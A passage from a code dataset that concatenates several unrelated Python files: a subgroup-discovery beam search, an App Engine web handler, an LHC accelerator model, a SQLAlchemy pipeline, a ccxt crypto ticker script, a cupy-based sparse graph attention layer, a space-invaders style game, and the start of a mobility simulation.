sg_to_beamIndex, computedScores, selectors):\n probs = np.zeros(len(selectors))\n for j in range(len(selectors)):\n if visited[i,j]:\n probs[j]=0\n else:\n probs[j] = computeProbability(i, j, computedScores, F, new_W, selectors, sg_to_beamIndex)\n # print(\"max: {}\".format(np.max(probs)))\n # print (np.histogram(probs))\n np.save(\"probs.npy\",probs)\n t=probs[probs.argsort()[-5:][::-1][-1]]\n probs[probs score_info[\"best_so_far\"][j]:\n score_info[\"best_so_far\"][j] = new_score\n local_prob = score_info[\"best_so_far\"][j]\n else:\n local_prob = 0 \n final_prob =( (1-weight)*global_prob) + ( weight*local_prob)\n return final_prob\n\ndef computeProbability(i, j, computedScores, F, new_W, selectors, sg_to_beamIndex):\n sg = Conjuction([selectors[j]])\n if sg in computedScores:\n global_prob = computedScores[sg]\n else:\n global_prob = 0\n scores = np.zeros(len(selectors))\n for k in range(len(selectors)):\n scores[j] = F[i,k] * new_W[k,j]\n local_prob = np.max(scores)\n if j == 1809:\n print(\"for {}\".format(selectors[j]))\n print (\"global_prob : {}, local_prob: {}\".format(global_prob, local_prob))\n final_prob = global_prob + 2*local_prob\n return final_prob\n\ndef create_sg_vector(selectors, last_sg, j, X):\n sel= selectors[j] \n new_selectors = last_sg.selectors+[sel]\n sg = Conjuction(new_selectors)\n sg_vector = sg.covers(X)\n return sg, sg_vector\n\ndef printHistory(history, sg):\n for pair in history[sg]:\n print(\"{} {}\".format(pair[0], pair[1]))\n\n\ndef track_history(history, sg, sel):\n if sg in history:\n history[sg].append(sel)\n else:\n history[sg] = [sel]\n\ndef getPath(history, sg, sg_to_index):\n indices = []\n for pair in history[sg]:\n j_prime=pair[0]\n index = sg_to_index[j_prime]\n indices.append(index)\n return removeDups(indices)\n\ndef removeDups(seq):\n seen = set()\n seen_add = seen.add\n return [x for x in seq if not (x in seen or seen_add(x))] \n\n\ndef beamSearch_auxData_greedy(V, W, target, X,Y, measure, max_depth=2, beam_width=10, result_set_size=10, threshold=0.3, min_support=1, u=70):\n tempData = [] #debug\n selectors_vals= []\n last_beam = None \n depth = 0\n attemps_threshold=2*u\n F= np.zeros(W.shape)\n [beam, computedScores] = L1_greedy(V,target, X, Y, measure, beam_width, threshold)\n print(beam)\n [selectors, original_features, sg_to_index] = createSelectors(X, []) \n new_W = createNewWeightMatrix(selectors, original_features, W)\n\n history ={}\n\n\n while beam != last_beam and depth < max_depth-1:\n print(\"depth:{}\".format(depth+2))\n last_beam = beam.copy()\n F= np.zeros((beam_width,len(selectors)))\n sg_to_beamIndex = create_sg_to_beamIndex(last_beam)\n visited = initializeVisitedMatrix(last_beam, selectors, sg_to_beamIndex, sg_to_index)\n initalizeScoreMatrix(F, computedScores, sg_to_beamIndex, sg_to_index, selectors, visited)\n for i in range(beam_width-1, -1,-1):\n print(\"expanding {}\".format(last_beam[i][1]))\n # printScoreMatrixStats(F, computedScores, sg_to_beamIndex, sg_to_index, selectors, visited)\n (i_score, last_sg) = last_beam[i]\n##################################\n soi = Conjuction([EquitySelector(\"814\",1)])\n if not (soi == last_sg):\n print(\"not soi, skipped\")\n continue\n print(\"calculating stats...\") \n for j, sel in enumerate(selectors):\n sg, sg_vector = create_sg_vector(selectors, last_sg, j, X)\n outcome_vector = target.covers(Y)\n quality = computeQuality(sg_vector, outcome_vector, measure)\n\n sel_vector = sel.covers(X)\n selectors_vals.append(sel_vector)\n tempData.append(quality)\n\n#############################\n if not getattr(last_sg, 'visited', False):\n setattr(last_sg, 'visited', True)\n pair_count=0\n attemps=0\n while pair_count\"\n subject = \"Thanks for joining Tel Aviv Music Company\"\n body = \"\"\" Thanks you for joining tlvmc \"\"\" % (explain_url, new_BBUser_url)\n mail.send_mail(sender_address, user_address, subject, body)\n\napplication = webapp.WSGIApplication([('/', MainPage),\n ('/welcome', MainPage),\n ('/signup', SignupHandler),\n ('/register', RegisterHandler),\n ('/artist/([^/]+)', ArtistHandler),\n ('/login', LoginHandler)\n ], debug=True)\n\ndef main(): \n logging.getLogger().setLevel(logging.DEBUG)\n run_wsgi_app(application)\nif __name__ == '__main__': main()","sub_path":"main_script.py","file_name":"main_script.py","file_ext":"py","file_size_in_byte":6189,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"448415267","text":"from PyHEADTAIL.machines.synchrotron import Synchrotron\nimport numpy as np\nfrom scipy.constants import c, e, m_p\n\n\nclass EmptyObject(object):\n pass\n\n\nclass LHC(Synchrotron):\n\n def __init__(self, machine_configuration=None, optics_mode='smooth', **kwargs):\n\n pp = EmptyObject()\n\n pp.machine_configuration = machine_configuration\n pp.optics_mode = optics_mode\n\n pp.n_segments = 1\n\n pp.RF_at='end_of_transverse'\n\n pp.longitudinal_mode = 'non-linear'\n pp.alpha = 3.225e-04\n pp.h_RF = 35640\n pp.mass = m_p\n pp.charge = e\n\n if machine_configuration == 'Injection':\n pp.p0 = 450e9 * e / c\n pp.p_increment = 0.\n pp.accQ_x = 64.28\n pp.accQ_y = 59.31\n pp.V_RF = 6e6\n pp.dphi_RF = 0.\n elif machine_configuration == '6.5_TeV_collision_tunes':\n pp.p0 = 6500e9 * e / c\n pp.p_increment = 0.\n pp.accQ_x = 64.31\n pp.accQ_y = 59.32\n pp.V_RF = 12e6\n pp.dphi_RF = 0.\n else:\n raise ValueError('machine_configuration not recognized!')\n\n if optics_mode == 'smooth':\n if 's' in list(kwargs.keys()):\n raise ValueError('s vector cannot be provided if optics_mode = \"smooth\"')\n\n pp.n_segments = kwargs['n_segments']\n pp.circumference = pp.h_RF * 2.5e-9 * c\n\n pp.name = None\n\n pp.beta_x = 92.7\n pp.D_x = 0\n pp.beta_y = 93.2\n pp.D_y = 0\n\n pp.alpha_x = None\n pp.alpha_y = None\n\n pp.s = None\n\n elif optics_mode == 'non-smooth':\n if 'n_segments' in list(kwargs.keys()):\n raise ValueError('n_segments cannot be provided if optics_mode = \"non-smooth\"')\n pp.n_segments = None\n pp.circumference = None\n\n pp.name = kwargs['name']\n\n pp.beta_x = kwargs['beta_x']\n pp.beta_y = kwargs['beta_y']\n\n try:\n pp.D_x = kwargs['D_x']\n except KeyError:\n pp.D_x = 0 * np.array(kwargs['s'])\n try:\n pp.D_y = kwargs['D_y']\n except KeyError:\n pp.D_y = 0 * np.array(kwargs['s'])\n\n pp.alpha_x = kwargs['alpha_x']\n pp.alpha_y = kwargs['alpha_y']\n\n pp.s = kwargs['s']\n\n else:\n raise ValueError('optics_mode not recognized!')\n\n # detunings\n pp.Qp_x = 0\n pp.Qp_y = 0\n\n pp.app_x = 0\n pp.app_y = 0\n pp.app_xy = 0\n\n for attr in list(kwargs.keys()):\n if kwargs[attr] is not None:\n if type(kwargs[attr]) is list or type(kwargs[attr]) is np.ndarray:\n str2print = '[%s ...]'%repr(kwargs[attr][0])\n else:\n str2print = repr(kwargs[attr])\n self.prints('Synchrotron init. From kwargs: %s = %s'\n % (attr, str2print))\n\n if not hasattr(pp, attr):\n raise NameError(\"I don't understand %s\"%attr)\n\n setattr(pp, attr, kwargs[attr]) \n\n\n super(LHC, self).__init__(optics_mode=pp.optics_mode, circumference=pp.circumference, n_segments=pp.n_segments, s=pp.s, name=pp.name,\n alpha_x=pp.alpha_x, beta_x=pp.beta_x, D_x=pp.D_x, alpha_y=pp.alpha_y, beta_y=pp.beta_y, D_y=pp.D_y,\n accQ_x=pp.accQ_x, accQ_y=pp.accQ_y, Qp_x=pp.Qp_x, Qp_y=pp.Qp_y, app_x=pp.app_x, app_y=pp.app_y, app_xy=pp.app_xy,\n alpha_mom_compaction=pp.alpha, longitudinal_mode=pp.longitudinal_mode,\n h_RF=np.atleast_1d(pp.h_RF), V_RF=np.atleast_1d(pp.V_RF), dphi_RF=np.atleast_1d(pp.dphi_RF), p0=pp.p0, p_increment=pp.p_increment,\n charge=pp.charge, mass=pp.mass, RF_at=pp.RF_at)\n\n","sub_path":"other/response_to_beam_distorsion/multibunch/machines_for_testing.py","file_name":"machines_for_testing.py","file_ext":"py","file_size_in_byte":4137,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"183577263","text":"\n\nfrom frontline.db import session\n\n\nclass SQLAlchemyPipeline:\n\n def process_item(self, item, spider):\n \"\"\"Save a database row.\n \"\"\"\n session.add(item.row())\n\n try:\n session.commit()\n\n except Exception as e:\n session.rollback()\n print(e)\n\n return item\n","sub_path":"frontline/pipelines.py","file_name":"pipelines.py","file_ext":"py","file_size_in_byte":330,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"609300043","text":"# -*- coding: utf-8 -*-\nimport os\nimport sys\nimport time\nimport ccxt # noqa: E402\nfrom styles import green, yellow, blue, red, pink, bold, underline\n\n\ndef print_args(*args):\n print(' '.join([str(arg) for arg in args]))\n\ndef print_usage():\n print_args(\"Usage: python \" + sys.argv[0], green('id'), yellow('[symbol]'))\n print_args(\"Symbol is required, for example:\")\n print_args(\"python \" + sys.argv[0], green('gdax'), yellow('BTC/USD'))\n get_exchanges()\n\n\ndef print_ticker(exchange, symbol):\n ticker = exchange.fetch_ticker(symbol.upper())\n print_args(\n green(exchange.id),\n yellow(symbol),\n 'ticker',\n ticker['datetime'],\n 'high: ' + str(ticker['high']),\n 'low: ' + str(ticker['low']),\n 'bid: ' + str(ticker['bid']),\n 'ask: ' + str(ticker['ask']),\n 'volume: ' + str(ticker['quoteVolume']))\n\n\n\ndef print_exch_symbols(exchange):\n # output all symbols\n print_args(green(id), 'has', len(exchange.symbols), 'symbols:', yellow(', '.join(exchange.symbols)))\n\n\ndef get_exchanges():\n return ccxt.exchanges\n\n\ndef get_exch_symbols(exchange):\n return exchange.symbols\n\n\ndef get_ticker(exchange, symbol):\n try: \n print_ticker(exchange, symbol)\n # get raw json data\n# ticker = exchange.fetch_ticker(symbol.upper())\n# print(ticker)\n\n except ccxt.DDoSProtection as e:\n print(type(e).__name__, e.args, 'DDoS Protection (ignoring)')\n except ccxt.RequestTimeout as e:\n print(type(e).__name__, e.args, 'Request Timeout (ignoring)')\n except ccxt.ExchangeNotAvailable as e:\n print(type(e).__name__, e.args, 'Exchange Not Available due to downtime or maintenance (ignoring)')\n except ccxt.AuthenticationError as e:\n print(type(e).__name__, e.args, 'Authentication Error (missing API keys, ignoring)')\n \n return ticker\n\n\n\n\nif __name__ == '__main__':\n\n print(\"\\n\\n CCXT -------------------------------------\\n\\n\")\n\n# supported_exchanges = 'Supported exchanges:', ', '.join(get_exchanges())\n# print(supported_exchanges)\n\n try:\n\n id = sys.argv[1] # get exchange id from command line arguments\n\n # check if the exchange is supported by ccxt\n exchange_found = id in ccxt.exchanges\n\n if exchange_found:\n print_args('Instantiating', green(id))\n\n # instantiate the exchange by id\n exchange = getattr(ccxt, id)()\n\n # load all markets from the exchange\n markets = exchange.load_markets()\n\n if len(sys.argv) > 2: # if symbol is present, get that symbol only\n symbol = sys.argv[2]\n get_ticker(exchange, symbol)\n else: \n print_args('Symbol not found')\n print_exch_symbols(exchange)\n print_usage()\n\n else:\n print_args('Exchange ' + red(id) + ' not found')\n print_usage()\n\n except Exception as e:\n print(type(e).__name__, e.args, str(e))\n print_usage()\n\n\n\n\n","sub_path":"ccxt_feed.py","file_name":"ccxt_feed.py","file_ext":"py","file_size_in_byte":3046,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"234753967","text":"import numpy as np\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nimport time\n\nimport scipy as sp\nfrom scipy import sparse\nimport cupy as cp\n\nimport pdb\n\nimport utils\n\nclass SpecialSpmmFunction(torch.autograd.Function):\n \"\"\"Special function for only sparse region backpropataion layer.\"\"\"\n @staticmethod\n def forward(ctx, indices, values, shape, b):\n a = torch.sparse_coo_tensor(indices, values, shape)\n ctx.save_for_backward(a, b)\n ctx.N = shape[0]\n return a @ b\n\n @staticmethod\n def backward(ctx, grad_output):\n a, b = ctx.saved_tensors\n grad_values = grad_b = None\n if ctx.needs_input_grad[1]:\n grad_a_dense = grad_output @ (b.t())\n edges_idx = a._indices()[0, :] * ctx.N + a._indices()[1, :]\n grad_values = grad_a_dense.view(-1)[edges_idx]\n if ctx.needs_input_grad[3]:\n grad_b = a.t() @ grad_output\n return None, grad_values, None, grad_b\n\n\nclass SpecialSpmm(nn.Module):\n def forward(self, indices, values, shape, b):\n return SpecialSpmmFunction.apply(indices, values, shape, b)\n\nclass SpGraphAttentionLayer(nn.Module):\n \"\"\"\n Sparse version GAT layer, similar to https://arxiv.org/abs/1710.10903\n \"\"\"\n\n def __init__(self, in_features, out_features, dropout, alpha, concat=True):\n super(SpGraphAttentionLayer, self).__init__()\n self.in_features = in_features\n self.out_features = out_features\n self.alpha = alpha\n self.concat = concat\n\n self.W = nn.Parameter(torch.zeros(size=(in_features, out_features)))\n nn.init.xavier_normal_(self.W.data, gain=1.414)\n \n self.a = nn.Parameter(torch.zeros(size=(2*out_features,1)))\n nn.init.xavier_normal_(self.a.data, gain=1.414)\n\n self.dropout = nn.Dropout(dropout)\n self.leakyrelu = nn.LeakyReLU(self.alpha)\n # self.special_spmm = SpecialSpmm()\n\n self.calculatedWh = False\n\n def forward(self, feats, adj, nodes=None, ts=[],dv='cuda'):\n # TODO for now, nodes is not needed -- we are not sharding\n # dv = 'cuda' if feats.is_cuda else 'cpu'\n N = feats.shape[0]\n mvtime = 0\n calctime = 0\n cootime = 0\n searchtime = 0\n csctime = 0\n row_csr_starts, col_csr = adj\n\n if not self.calculatedWh:\n t = time.time()\n feats = feats.cuda() if dv==\"cuda\" else feats\n\n t2 = time.time()\n h = feats @ self.W\n self.h = h\n\n t3 = time.time()\n a1 = self.a[:self.out_features,:] # self-att\n a2 = self.a[self.out_features:,:] # neigh-att\n \n t4 = time.time()\n # TODO these activations are supposed to happen individually for each edge, but we'll ignore that for now\n self.hself = torch.exp(-self.leakyrelu(h@a1)) \n self.hneigh = torch.exp(-self.leakyrelu(h@a2)) # (N,1)\n \n t5 = time.time()\n hself = self.hself\n hneigh = self.hneigh\n\n mvtime += t2 - t #makes up for half the time on sparse graphs\n calctime += t3 - t2 + t5 - t4\n # mvtime += t4 - t3\n else:\n hself = self.hself\n hneigh = self.hneigh\n h = self.h\n\n # t = time.time()\n # adj = adj[nodes]\n \n # t2 = time.time()\n # adj = adj.cuda() if dv==\"cuda\" else adj # makes up for 10% of time on sparse graphs\n \n # mvtime += time.time() - t2\n # searchtime += t2 - t\n\n # pdb.set_trace()\n # edges = adj.nonzero().t()\n\n # Self-attention on the nodes - Shared attention mechanism\n # here's the manual implementation\n row_csr_starts_cpu = row_csr_starts\n \n t = time.time()\n if dv=='cuda':\n row_csr_starts = torch.tensor(row_csr_starts).squeeze().cuda()\n col_csr = torch.tensor(col_csr).squeeze().cuda()\n mvtime += time.time() - t\n\n if dv=='cuda':\n upper_row_starts = utils.torch2cupy(row_csr_starts,squeeze=1)\n upper_cols = utils.torch2cupy(col_csr,squeeze=1)\n lower_col_starts = utils.torch2cupy(row_csr_starts,squeeze=1)\n lower_rows = utils.torch2cupy(col_csr,squeeze=1)\n else:\n upper_row_starts = row_csr_starts\n upper_cols = col_csr\n lower_col_starts = row_csr_starts\n lower_rows = col_csr\n \n # TODO searchsort is done on cpu\n t1=time.time()\n vidxs = np.arange(col_csr.shape[0])+1\n d = np.searchsorted(row_csr_starts_cpu,vidxs)-1\n\n t2 = time.time()\n if dv=='cuda': d = torch.tensor(d).cuda()\n\n t3 = time.time()\n selfd = hself[d]\n neighd = hneigh[d]\n selfv = hself[col_csr]\n neighv = hneigh[col_csr]\n t4 = time.time()\n\n # upper_csr_values = hself[d] + hneigh[upper_cols]\n upper_csr_values = selfd + neighv\n # lower_csc_values = hneigh[d] + hself[lower_rows]\n lower_csc_values = neighd + selfv\n diag_values = hneigh + hself\n\n upper_csr_values = self.dropout(upper_csr_values)\n lower_csc_values = self.dropout(lower_csc_values)\n diag_values = self.dropout(diag_values)\n\n calctime += time.time() - t4\n searchtime += t2 -t1 + t4-t3\n mvtime += t3-t2\n # instead of manually doing the csr stuff, let scipy handle it\n # since we are only timing how large an impact the memory transfer to gpu is\n t = time.time()\n if dv=='cuda':\n upper_csr_values = utils.torch2cupy(upper_csr_values,squeeze=1) \n lower_csc_values = utils.torch2cupy(lower_csc_values,squeeze=1)\n diag_values = utils.torch2cupy(diag_values)\n else:\n upper_csr_values = upper_csr_values.numpy().squeeze()\n lower_csc_values = lower_csc_values.numpy().squeeze()\n diag_values = diag_values.cpu().numpy()\n mvtime += time.time() - t\n\n if dv=='cuda':\n upper_csr = cp.sparse.csr_matrix((upper_csr_values,upper_cols,upper_row_starts),shape=(N,N))\n lower_csc = cp.sparse.csc_matrix((lower_csc_values,lower_rows,lower_col_starts),shape=(N,N))\n else:\n upper_csr = sp.sparse.csr_matrix((upper_csr_values,upper_cols,upper_row_starts),shape=(N,N))\n lower_csc = sp.sparse.csc_matrix((lower_csc_values,lower_rows,lower_col_starts),shape=(N,N))\n\n # calculate the matrix products with the att matrix\n if dv=='cuda':\n h = utils.torch2cupy(h)\n else:\n h = h.numpy()\n\n t = time.time()\n upper_sum = upper_csr.sum(axis=1)\n j = time.time()\n lower_sum = lower_csc.sum(axis=1)\n csctime+=time.time()-j\n e_rowsum = upper_sum + lower_sum + diag_values\n\n upper_prod = upper_csr.dot(h)\n # upper_prod = upper_csr@(h)\n lower_prod = lower_csc.dot(h)\n # lower_prod = lower_csc@(h)\n csctime += time.time() - t\n if dv=='cuda':\n h_prime = torch.zeros((N,self.out_features)).cuda()\n h_prime_cupy = utils.torch2cupy(h_prime)\n h_prime_cupy += upper_prod + lower_prod + (diag_values*h)\n h_prime_cupy = h_prime_cupy / e_rowsum\n else:\n h_prime = upper_prod + lower_prod + (diag_values*h)\n h_prime = h_prime / e_rowsum\n h_prime = torch.tensor(h_prime)\n\n if self.concat:\n # if this layer is not last layer,\n out = F.elu(h_prime)\n else:\n # if this layer is last layer,\n out = h_prime\n\n calctime += time.time() - t\n\n t = time.time()\n if dv=='gpu' and out.device!='cpu': out = out.cpu()\n mvtime+= time.time()-t\n \n ts.append([mvtime,searchtime,calctime,csctime])\n return out\n\n def __repr__(self):\n return self.__class__.__name__ + ' (' + str(self.in_features) + ' -> ' + str(self.out_features) + ')'\n","sub_path":"pyGAT/layers_cupy_csr_csc.py","file_name":"layers_cupy_csr_csc.py","file_ext":"py","file_size_in_byte":8068,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"128754110","text":"from PPlay.window import *\nfrom PPlay.gameimage import *\nfrom PPlay.sprite import *\nfrom PPlay.mouse import *\nfrom settings import *\nimport random\n\ndef jogoLoop(janela,dificuldade):\n sp_monster = None\n teclado = janela.get_keyboard()\n\n #Configurações\n h_pressed = False\n show_fps = False\n dificult = dificuldade\n points = 0\n\n #Player\n player_life = 3\n player_vel = PLAYER_V * 10/dificult\n player = Sprite(player_img)\n player.set_position(janela_WIDTH/2 - PLAYER_WIDTH/2, janela_HEIGHT - 2 - PLAYER_HEIGHT)\n\n #Shoots\n shoot_vel = SHOOT_V * 10/dificult\n enemy_shoot_vel = SHOOT_V * 5/dificult\n shoots = []\n last_shoot = 0\n enemy_shoot_delay = 2000/(dificult * 0.8)\n last_enemy_shoot = 0\n enemy_shoots = []\n\n #Enemy\n #Com base no tamanho da tela calcula quantos monstros devem ter na matriz\n enemy_per_line = int(janela_WIDTH/(enemy1_width + enemy_padding + 3/100 * janela_WIDTH) - 2)\n enemy_per_col = int(janela_HEIGHT/(enemy1_height + enemy_padding + 3/100 * janela_HEIGHT) - 2)\n\n #Matriz\n matriz_mov_delay = 1000/(dificult * 0.7)\n matriz_width = ((enemy_per_line - 1) * (enemy1_width + enemy_padding) + enemy1_width)\n matriz_height = ((enemy_per_col - 1) * (enemy1_height + enemy_padding) + enemy1_height)\n matriz = []\n matriz_x = janela_WIDTH/2 - matriz_width/2\n matriz_y = 3/100 * janela_HEIGHT\n matriz_x_vel = matriz_x_ch\n left_collide = False\n right_collide = True\n\n #A cada 2 segundos a matriz move k pixels no eixo x\n last_mov = 0\n\n #Contador do fps\n fps_delay = 0\n\n #Animação\n explosoes = []\n\n rand_x = random.randint(0,enemy_per_col-1)\n rand_y = random.randint(0,enemy_per_line-1)\n\n #Cria a matriz de monstros inicial\n for i in range(0,enemy_per_col):\n aux = []\n aux_padding_y = 0\n if(i != 0):\n aux_padding_y = enemy_padding\n for j in range(0,enemy_per_line):\n aux_padding_x = 0\n if(j != enemy_per_line):\n aux_padding_x = enemy_padding\n if(i == rand_x and j == rand_y):\n enemy_aux = Sprite(enemy1_img_sp)\n sp_monster = enemy_aux\n else:\n enemy_aux = Sprite(enemy1_img)\n enemy_aux.set_position((j * (enemy1_width + enemy_padding)) + matriz_x, (i * (enemy1_height + enemy_padding)) + matriz_y)\n aux.append(enemy_aux)\n matriz.append(aux)\n\n\n while(True):\n janela.set_background_color([0,0,0])\n\n if(teclado.key_pressed(\"escape\")):\n return points\n\n if(teclado.key_pressed(\"h\")):\n if(not h_pressed):\n show_fps = not show_fps\n h_pressed = True\n else:\n h_pressed = False\n\n fps_delay += janela.delta_time()\n\n if(show_fps):\n #Só atualiza o fps a cada 0.75 segundos\n if(fps_delay >= 0.75):\n fps_delay = 0\n if(janela.delta_time() == 0):\n text = \"999\"\n else:\n text = str(int(1/janela.delta_time()))\n janela.draw_text(text, 5, 5, 12, (255,255,255))\n\n #Desenha a pontuação\n aux_points = \"Points: \"+str(points)\n janela.draw_text(aux_points, janela_WIDTH - 150, 20, 20, (255,255,255))\n\n #Desenha a quantidade de vida do player\n aux_life = \"Life: \"+str(player_life)\n janela.draw_text(aux_life, janela_WIDTH - 150, 50, 20, (255,255,255))\n\n #Faz o controle da movimentação do Player (d -> Direita, a -> Esquerda)\n if(teclado.key_pressed(\"d\")):\n player.x += player_vel * janela.delta_time()\n elif(teclado.key_pressed(\"a\")):\n player.x -= player_vel * janela.delta_time()\n\n #Faz o sistema de Warp do player nas bordas da tela\n if(player.x > janela_WIDTH):\n player.x = 0 - PLAYER_WIDTH\n if(player.x + PLAYER_WIDTH < 0):\n player.x = janela_WIDTH\n\n #Faz o disparo do tiro do Player\n if(janela.time_elapsed() - last_shoot > RELOAD_TIME * dificult):\n if(teclado.key_pressed(\"space\")):\n last_shoot = janela.time_elapsed()\n shoot = Sprite(shoot_img)\n shoot.x = player.x + PLAYER_WIDTH/2\n shoot.y = player.y + 5\n shoots.append(shoot)\n\n #Atualiza a posição de cada tiro do Player\n for k,shoot in enumerate(shoots):\n #Se o tiro sair da tela ele deve ser destruido\n if(shoot.y - shoot.height < 0):\n del shoots[k]\n else:\n shoot.y -= shoot_vel * janela.delta_time()\n shoot.draw()\n\n #Redesenha os monstros com base no offset da matriz\n matriz_is_empty = True\n for i,line in enumerate(matriz):\n for j,enemy in enumerate(line):\n if(enemy != None):\n #Guarda se a matriz está vazia\n matriz_is_empty = False\n enemy.set_position((j * (enemy1_width + enemy_padding)) + matriz_x, (i * (enemy1_height + enemy_padding)) + matriz_y)\n enemy.draw()\n\n #Uma nova Wave só é criada se a matriz atual estiver vazia e ocupar menor de 2/3 do tamanho da tela\n if(matriz_is_empty and matriz_width < 2/3 * janela_WIDTH):\n #Cada level rende ao Player 1000 pontos\n points += 1000\n #Cada level aumenta a dificuldade em 0.5\n dificult += 0.5\n #Atualiza os valores que dependem da dificuldade\n player_vel = PLAYER_V * 10/dificult\n shoot_vel = SHOOT_V * 10/dificult\n matriz_mov_delay = 1000/(dificult * 0.7)\n enemy_shoot_delay = 1000/(dificult * 0.8)\n\n #Limpa a matriz de monstros\n matriz = []\n #Os monstros só são adicionados no sentido horizontal\n enemy_per_line = enemy_per_line + 1\n matriz_width += enemy1_width + enemy_padding\n matriz_x = janela_WIDTH/2 - matriz_width/2\n matriz_y = 3/100 * janela_HEIGHT\n\n #Randomiza o monstro especial\n rand_x = random.randint(0,enemy_per_col-1)\n rand_y = random.randint(0,enemy_per_line-1)\n\n #Passa novamente pelo processo de criação da matriz\n for i in range(0,enemy_per_col):\n aux = []\n aux_padding_y = 0\n if(i != 0):\n aux_padding_y = enemy_padding\n for j in range(0,enemy_per_line):\n aux_padding_x = 0\n if(j != enemy_per_line):\n aux_padding_x = enemy_padding\n if(rand_x == i and rand_y == j):\n enemy_aux = Sprite(enemy1_img_sp)\n sp_monster = enemy_aux\n else:\n enemy_aux = Sprite(enemy1_img)\n enemy_aux.set_position((j * (enemy1_width + enemy_padding)) + matriz_x, (i * (enemy1_height + enemy_padding)) + matriz_y)\n aux.append(enemy_aux)\n matriz.append(aux)\n\n #Faz a movimentação de toda a matriz a cada determinado tempo\n if(janela.time_elapsed() - last_mov > matriz_mov_delay):\n last_mov = janela.time_elapsed()\n aux = -2\n #Faz os testes de colisão que são retornados para a variável aux\n for linha in matriz:\n for enemy in linha:\n if(enemy != None):\n #Testa se o monstro se chocou contra o player\n if(enemy.y + enemy1_height >= player.y):\n aux = 0\n break\n #Testa se o monstro está a 20 pixels de distância da borda e se ele pode colidir com o lado direito\n if(enemy.x + enemy1_width > janela_WIDTH - 20 and right_collide):\n #Como a movimentação da matriz é feita com porções de 10 pixels, deve-se\n #criar uma flag que irá sinalizar se a matriz já colidiu com a extremidade\n #oposta da tela, evitando sucessivas colisões\n left_collide = True\n right_collide = False\n aux = -1\n break\n #Faz o mesmo do anterior, porém para o lado esquerdo\n if(enemy.x < 20 and left_collide):\n left_collide = False\n right_collide = True\n aux = -1\n break\n #Se algum monstro já colidiu não a necessidade de continuar testando\n if(aux != -2):\n break\n\n #Fim de jogo\n if(aux == 0):\n return points\n #Os monstros começam a se deslocar para o lado oposto\n elif(aux == -1):\n matriz_x_vel *= -1\n matriz_y += matriz_y_ch\n matriz_x += matriz_x_vel\n\n #Cria os tiros dos monstros\n if(janela.time_elapsed() - last_enemy_shoot > enemy_shoot_delay):\n last_enemy_shoot = janela.time_elapsed()\n aux_vetor_enemy = []\n #Percorre a matriz guardando todos os monstros que ainda estão vivos\n for i in matriz:\n for enemy in i:\n if(enemy != None):\n aux_vetor_enemy.append(enemy)\n\n #Escolhe um monstro aleatóriamente para atirar\n random.shuffle(aux_vetor_enemy)\n aux_shoot = Sprite(shoot_img)\n aux_shoot.x = aux_vetor_enemy[0].x + enemy1_width/2\n aux_shoot.y = aux_vetor_enemy[0].y + enemy1_height + 5\n enemy_shoots.append(aux_shoot)\n\n #Testa se cada tiro dos monstros se chocou contra o player\n for k,tiro in enumerate(enemy_shoots):\n if(tiro.y >= player.y):\n if(tiro.collided(player)):\n player_life -= 1\n del enemy_shoots[k]\n\n #Atualiza o tiro dos monstros\n for k,shoot in enumerate(enemy_shoots):\n #Testa se o tiro saiu da janela\n if(shoot.y > janela_HEIGHT):\n del enemy_shoots[k]\n else:\n shoot.y += enemy_shoot_vel * janela.delta_time()\n shoot.draw()\n\n if(player_life <= 0):\n return points\n\n #Colisão do tiro otimizada (FPS ocilando entre 200 e 300)\n for k,tiro in enumerate(shoots):\n #Otimização de colisão\n if(tiro.x >= matriz_x and tiro.x <= matriz_x + matriz_width and tiro.y >= matriz_y and tiro.y <= matriz_y + matriz_height):\n for i in range(len(matriz) - 1,-1,-1):\n for j in range(len(matriz[i]) - 1,-1,-1):\n if(matriz[i][j] != None):\n if(tiro.collided(matriz[i][j])):\n if(matriz[i][j] == sp_monster):\n player_life += 1\n aux_explosao = Sprite(\"images/explosion.png\", 14)\n aux_explosao.set_total_duration(1000)\n aux_explosao.set_position(matriz[i][j].x, matriz[i][j].y)\n aux_explosao.set_loop(False)\n explosoes.append(aux_explosao)\n matriz[i][j] = None\n points += 100\n del shoots[k]\n\n #Colisão do tiro sem otimização (FPS ocilando entre 150 e 250)\n # for k,tiro in enumerate(shoots):\n # for i in range(len(matriz)):\n # for j in range(len(matriz[i])):\n # if(matriz[i][j] != None):\n # if(tiro.collided(matriz[i][j])):\n # matriz[i][j] = None\n # del shoots[k]\n\n #Deleta todas as explosões que não estão mais animando\n #Desenha todas que ainda tem animação\n for k,explosao in enumerate(explosoes):\n if not explosao.is_playing():\n del explosoes[k]\n else:\n explosao.draw()\n explosao.update()\n\n player.draw()\n\n janela.update()\n","sub_path":"jogo.py","file_name":"jogo.py","file_ext":"py","file_size_in_byte":12500,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"464201553","text":"# coding: utf-8\n#\n# Copyright (C) 2008-2010 Istituto per l'Interscambio Scientifico I.S.I.\n# You can contact us by email (isi@isi.it) or write to:\n# ISI Foundation, Viale S. Severo 65, 10133 Torino, Italy.\n#\n# This program was written by André Panisson \n#\n\n'''\nCreated on Jan 24, 2012\n\n@author: André Panisson\n@contact: panisson@gmail.com\n@organization: ISI Foundation, Torino, Italy\n'''\nfrom pymobility.models.mobility import gauss_markov, reference_point_group, \\\n tvc, truncated_levy_walk, random_direction, random_waypoint, random_walk\nimport numpy as np\nimport logging\nfrom scipy.spatial.distance import cdist\nimport matplotlib.animation as manimation\nimport sys\n\n\nlogging.basicConfig(format='%(asctime)-15s - %(message)s', level=logging.INFO)\nlogger = logging.getLogger(\"simulation\")\n\n# set this to true if you want to plot node positions\nDRAW = True\n\nFPG=20\n\nif DRAW:\n FFMpegWriter = manimation.writers['ffmpeg']\n metadata = dict(title='Movie Test', artist='Matplotlib', comment='Movie support!')\n writer = FFMpegWriter(fps=FPG, metadata=metadata)\n\n\n# number of nodes\nnr_nodes = 100\n\n# simulation area (units)\nMAX_X, MAX_Y = 100, 100\n\n# max and min velocity\nMIN_V, MAX_V = 0.1, 1.\n\n# max 